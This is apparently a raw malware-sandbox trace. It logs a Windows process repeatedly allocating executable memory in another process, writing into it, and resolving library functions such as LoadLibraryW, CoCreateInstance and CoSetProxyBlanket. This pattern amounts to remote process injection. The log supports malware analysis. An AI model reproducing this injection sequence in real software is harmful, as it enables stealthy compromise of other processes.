	[0215.544] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.544] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.545] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.545] ResetEvent (hEvent=0x548) returned 1
	[0215.545] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.545] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.545] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.546] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.546] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.546] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004094, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.546] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.547] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.547] lstrlenA (lpString="WideCharToMultiByte") returned 19
	[0215.547] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.547] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x274993c*, nSize=0x14, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x274993c*, lpNumberOfBytesWritten=0x128674*=0x14) returned 1
	[0215.547] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.547] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.547] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.547] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.548] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.548] ResetEvent (hEvent=0x548) returned 1
	[0215.548] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.548] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.548] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.548] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.548] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.549] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004098, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.549] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.549] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0215.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27499a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0215.549] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733188
	[0215.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27499a0, cbMultiByte=-1, lpWideCharStr=0x2733188, cchWideChar=11 | out: lpWideCharStr="USER32.dll") returned 11
	[0215.549] lstrlenW (lpString="USER32.dll") returned 10
	[0215.549] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.550] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2733188*, nSize=0x16, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2733188*, lpNumberOfBytesWritten=0x128674*=0x16) returned 1
	[0215.550] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f8 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f8*=0x70) returned 1
	[0215.550] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.550] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.550] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0xc, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285f0*=0xc) returned 1
	[0215.551] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618*, nSize=0x70, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesWritten=0x1285f0*=0x70) returned 1
	[0215.551] ResetEvent (hEvent=0x548) returned 1
	[0215.551] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.551] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f0*=0x70) returned 1
	[0215.551] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.552] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.552] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.552] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2733188) returned 1
	[0215.552] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.552] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.552] lstrlenA (lpString="wsprintfW") returned 9
	[0215.552] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.552] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749996*, nSize=0xa, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749996*, lpNumberOfBytesWritten=0x128674*=0xa) returned 1
	[0215.553] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.553] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.553] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.553] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.553] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.554] ResetEvent (hEvent=0x548) returned 1
	[0215.554] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.554] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.554] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.554] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.554] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.554] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x100040c4, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.555] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.555] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.555] lstrlenA (lpString="wvsprintfA") returned 10
	[0215.555] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.555] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749988*, nSize=0xb, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749988*, lpNumberOfBytesWritten=0x128674*=0xb) returned 1
	[0215.555] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.556] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.556] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.556] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.556] ResetEvent (hEvent=0x548) returned 1
	[0215.556] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.557] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.557] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.557] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.557] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.557] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x100040c8, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.558] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.558] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0215.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2749a08, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10
	[0215.558] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733188
	[0215.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2749a08, cbMultiByte=-1, lpWideCharStr=0x2733188, cchWideChar=10 | out: lpWideCharStr="ole32.dll") returned 10
	[0215.558] lstrlenW (lpString="ole32.dll") returned 9
	[0215.558] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.558] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2733188*, nSize=0x14, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2733188*, lpNumberOfBytesWritten=0x128674*=0x14) returned 1
	[0215.558] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f8 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f8*=0x70) returned 1
	[0215.558] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.558] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.559] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0xc, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285f0*=0xc) returned 1
	[0215.559] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618*, nSize=0x70, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesWritten=0x1285f0*=0x70) returned 1
	[0215.559] ResetEvent (hEvent=0x548) returned 1
	[0215.559] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.560] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f0*=0x70) returned 1
	[0215.560] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.560] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.560] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.560] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2733188) returned 1
	[0215.560] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.560] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.560] lstrlenA (lpString="IIDFromString") returned 13
	[0215.560] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.560] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27499e8*, nSize=0xe, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27499e8*, lpNumberOfBytesWritten=0x128674*=0xe) returned 1
	[0215.561] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.561] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.561] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.561] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.568] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.569] ResetEvent (hEvent=0x548) returned 1
	[0215.569] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.569] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.569] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.569] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.569] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.569] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x100040f4, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.570] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.570] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.570] lstrlenA (lpString="CoSetProxyBlanket") returned 17
	[0215.570] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.570] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27499d4*, nSize=0x12, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27499d4*, lpNumberOfBytesWritten=0x128674*=0x12) returned 1
	[0215.571] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.571] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.571] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.571] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.571] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.572] ResetEvent (hEvent=0x548) returned 1
	[0215.572] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.572] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.572] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.572] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.572] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.572] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x100040f8, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.573] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.573] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.573] lstrlenA (lpString="CoCreateInstance") returned 16
	[0215.573] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.573] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27499c0*, nSize=0x11, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27499c0*, lpNumberOfBytesWritten=0x128674*=0x11) returned 1
	[0215.574] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.574] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.574] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.574] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.575] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.575] ResetEvent (hEvent=0x548) returned 1
	[0215.575] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.575] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.575] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.575] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.575] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.576] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x100040fc, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.576] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.576] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.576] lstrlenA (lpString="CoUninitialize") returned 14
	[0215.576] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.576] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27499ae*, nSize=0xf, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27499ae*, lpNumberOfBytesWritten=0x128674*=0xf) returned 1
	[0215.577] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.577] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.577] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.577] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.578] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.578] ResetEvent (hEvent=0x548) returned 1
	[0215.578] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.578] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.578] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.578] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.578] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.579] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004100, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.579] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.579] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.579] lstrlenA (lpString="CoInitializeEx") returned 14
	[0215.579] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.579] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27499f8*, nSize=0xf, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27499f8*, lpNumberOfBytesWritten=0x128674*=0xf) returned 1
	[0215.580] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.580] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.580] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.580] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.580] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.581] ResetEvent (hEvent=0x548) returned 1
	[0215.581] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
